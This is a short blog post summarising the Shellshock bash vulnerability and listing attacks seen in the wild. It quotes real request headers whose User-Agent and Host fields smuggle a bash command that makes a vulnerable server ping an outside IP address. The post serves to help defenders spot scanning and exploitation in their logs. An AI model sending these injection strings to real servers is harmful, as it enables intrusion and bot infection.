Tumblelog by Soup.io
Newer posts are loading.
You are at the newest post.
Click here to check if anything new just came in.
raistlin
14:33

Quick summary on ShellShocker

This post contains no original research but just a few links and info on the ShellShocker bug. I put it together to have a handy reference for friends & co., feel free to share.

A summary, along with test cases and info:

Attacks going on in the wild:

- Multiple reports of IP addresses scanning for the vuln with consistent user agent: User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138. 

Request: "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0"
Host: -
UA: "() { :;}; /bin/ping -c 1 198.101.206.138"

Originally this was by Graham at Errata Security (read here) but he has not been scanning for days, so if you still see it, that's not good. 
Also, Robert's scanner is polite:
IP: 209.126.230.72
Request: "GET / HTTP/1.0 "
Host: "() { :; }; ping -c 11 209.126.230.74"
UA:  "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"

The pattern above is being used in active exploitation (see also here), and that specific attack drops a bot that a source connected to past infection of routers (although this version is for x86).

Don't be the product, buy the product!

Schweinderl